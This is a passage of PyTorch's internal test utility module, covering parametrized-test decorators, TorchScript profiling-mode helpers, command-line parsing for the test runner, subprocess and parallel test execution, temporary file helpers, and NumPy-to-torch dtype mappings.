no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections.abc import Sequence, Mapping
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import Any, Dict, Iterable, Iterator, Optional, Union, List, Tuple, Type, TypeVar
from unittest.mock import MagicMock
import numpy as np
import expecttest
from torch.testing._comparison import (
assert_equal as assert_equal,
Pair,
TensorLikePair,
BooleanPair,
NumberPair,
UnsupportedInputs,
NonePair,
ErrorMeta,
)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
import torch.backends.xnnpack
from enum import Enum
from statistics import mean
import functools
from .composite_compliance import no_dispatch
from torch.testing._internal.common_dtype import get_all_dtypes
from torch.nn import ModuleList, ModuleDict, Sequential, ParameterList, ParameterDict
from torch._C import ScriptList, ScriptDict # type: ignore[attr-defined]
from torch.onnx import (register_custom_op_symbolic,
unregister_custom_op_symbolic)
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
NATIVE_DEVICES = ('cpu', 'cuda', 'meta')
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
Concretely, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
"""
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
fn.parametrize_fn = compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn)
else:
fn.parametrize_fn = self._parametrize_test
return fn
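# Illustrative sketch only (a hypothetical subclass, not part of this module):
# a derived _TestParametrizer that emits one test per dtype.
#
#   class dtype_parametrizer(_TestParametrizer):
#       def _parametrize_test(self, test, generic_cls, device_cls):
#           for dtype in (torch.float32, torch.int64):
#               test_name = str(dtype).replace('torch.', '')
#               yield (test, test_name, {'dtype': dtype})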
def compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn):
"""
Returns a parametrize_fn that parametrizes over the product of the parameters handled
by the given parametrize_fns. Each given parametrize_fn should have the signature
f(test, generic_cls, device_cls).
The test names will be a combination of the names produced by the parametrize_fns in
"<new_name>_<old_name>" order. This order is done to match intuition for constructed names
when composing multiple decorators; the names will be built in top to bottom order when stacking
parametrization decorators.
Args:
old_parametrize_fn (callable) - First parametrize_fn to compose.
new_parametrize_fn (callable) - Second parametrize_fn to compose.
"""
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
redundant_params = set(old_param_kwargs.keys()).intersection(new_param_kwargs.keys())
if redundant_params:
raise RuntimeError('Parametrization over the same parameter by multiple parametrization '
'decorators is not supported. For test "{}", the following parameters '
'are handled multiple times: {}'.format(
test.__name__, redundant_params))
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
merged_test_name = '{}{}{}'.format(new_test_name,
'_' if old_test_name != '' and new_test_name != '' else '',
old_test_name)
yield (new_test, merged_test_name, full_param_kwargs)
return composite_fn
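# For example, stacking two @parametrize decorators routes through this
# composition, so (roughly):
#
#   @parametrize("y", ['foo', 'bar'])
#   @parametrize("x", [1, 2])
#   def test_qux(self, x, y): ...
#
# generates tests named like "test_qux_y_foo_x_1", with the top (newer)
# decorator's name component first.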
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
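# Typical usage (a sketch; TestFoo is a stand-in class name):
#
#   class TestFoo(unittest.TestCase):
#       @parametrize("x", range(3))
#       def test_bar(self, x):
#           self.assertGreaterEqual(x, 0)
#
#   instantiate_parametrized_tests(TestFoo)  # adds test_bar_x_0 ... test_bar_x_2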
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
responsibility of naming these test functions. The default test names consist of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
arg_str (str): String of arg names separate by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
test_name = self._get_subtest_name(values, explicit_name=maybe_name)
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
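# Note: the torch._C flag setters used below return the *previous* value, so
# cppProfilingFlagsToProfilingMode() sets and immediately restores each flag
# to read the current executor configuration without changing it.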
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._get_graph_executor_optimize(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._get_graph_executor_optimize(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._get_graph_executor_optimize(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._get_graph_executor_optimize(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._get_graph_executor_optimize(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._get_graph_executor_optimize(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
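# Monkey-patch ScriptFunction/ScriptMethod calls so every TorchScript
# invocation in the test suite goes through the profiling-aware wrappers
# above and exercises the selected graph executor mode.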
# TODO fix when https://github.com/python/mypy/issues/2427 is addressed
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
is_running_via_run_test = "run_test.py" in getattr(__main__, "__file__", "")
parser = argparse.ArgumentParser(add_help=not is_running_via_run_test)
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
    # The following snippet is adapted from the Python 3 core library's
    # subprocess.call, with only these changes:
    # 1. An `except KeyboardInterrupt` block added for SIGINT handling.
    # 2. In Python 2, subprocess.Popen doesn't return a context manager, so we
    #    do `p.wait()` in a `finally` block to keep the code portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
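# For example (illustrative only): chunk_list([1, 2, 3, 4, 5], 2) returns
# [[1, 3, 5], [2, 4]] -- round-robin shards rather than contiguous slices,
# which is what the parallel test runner relies on.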
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
    strip_py = re.sub(r'\.py$', '', filename)  # escape the dot so only a literal ".py" suffix is stripped
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
                # Recurse into nested suites instead of returning early so the
                # remaining suites in this loop are still linted.
                succeed = lint_test_case_extension(test_case_or_suite) and succeed
                continue
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
other_args = []
if IMPORT_DISABLED_TESTS:
other_args.append('--import-disabled-tests')
if IMPORT_SLOW_TESTS:
other_args.append('--import-slow-tests')
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
from xmlrunner.result import _XMLTestResult # type: ignore[import]
class XMLTestResultVerbose(_XMLTestResult):
"""
Adding verbosity to test outputs:
by default test summary prints 'skip',
but we want to also print the skip reason.
GH issue: https://github.com/pytorch/pytorch/issues/69014
This works with unittest_xml_reporting<=3.2.0,>=2.0.0
(3.2.0 is latest at the moment)
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def addSkip(self, test, reason):
super().addSkip(test, reason)
for c in self.callback.__closure__:
if isinstance(c.cell_contents, str) and c.cell_contents == 'skip':
# this message is printed in test summary;
# it stands for `verbose_str` captured in the closure
c.cell_contents = f"skip: {reason}"
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(
output=test_report_path,
verbosity=2 if verbose else 1,
resultclass=XMLTestResultVerbose))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
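# A minimal usage sketch (illustrative only) -- both helpers yield a path and
# clean it up on exit, regardless of platform:
#
#   with TemporaryFileName() as fname:
#       torch.save(torch.ones(3), fname)
#       t = torch.load(fname)
#
#   with TemporaryDirectoryName() as dirname:
#       torch.save(torch.ones(3), os.path.join(dirname, 'tensor.pt'))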
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_CUDA = torch.cuda.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = torch.onnx._CAFFE2_ATEN_FALLBACK
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests are enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.)
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Enables crossref tests, in addition to the standard tests which
# are being run. Crossref tests work by installing a torch
# function mode that runs extra compute alongside the regular
# computation that happens with the test. After both computations
# are done, we cross-reference them (thus the name) to check for
# correctness, before throwing out the extra compute and proceeding
# as we had before. By default, we don't run these tests.
TEST_WITH_CROSSREF = os.getenv('PYTORCH_TEST_WITH_CROSSREF', '0') == '1'
def skipIfCrossRef(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_CROSSREF:
raise unittest.SkipTest("test doesn't currently with crossref")
else:
fn(*args, **kwargs)
return wrapper
class CrossRefMode(torch.overrides.TorchFunctionMode):
def __torch_function__(self, func, types, args=(), kwargs=None):
kwargs = kwargs or {}
r = func(*args, **kwargs)
return r
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# If this is True then CUDA memory leak checks are skipped. If this is false
# then CUDA memory leak checks are performed.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests when running on GitHub Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
# numpy dtypes like np.float64 are not instances, but rather classes. This leads to rather absurd cases like
# np.float64 != np.dtype("float64") but np.float64 == np.dtype("float64").type.
# Especially when checking against a reference we can't be sure which variant we get, so we simply try both.
def numpy_to_torch_dtype(np_dtype):
try:
return numpy_to_torch_dtype_dict[np_dtype]
except KeyError:
return numpy_to_torch_dtype_dict[np_dtype.type]
def has_corresponding_torch_dtype(np_dtype):
try:
numpy_to_torch_dtype(np_dtype)
return True
except KeyError:
return False
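# Illustration of the quirk described above (not part of the original file):
#
#   numpy_to_torch_dtype(np.float64)            # torch.float64, direct dict hit
#   numpy_to_torch_dtype(np.dtype("float64"))   # torch.float64, via the .type fallback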
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
torch_to_numpy_dtype_dict.update({
torch.bfloat16: np.float32,
torch.complex32: np.complex64
})
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
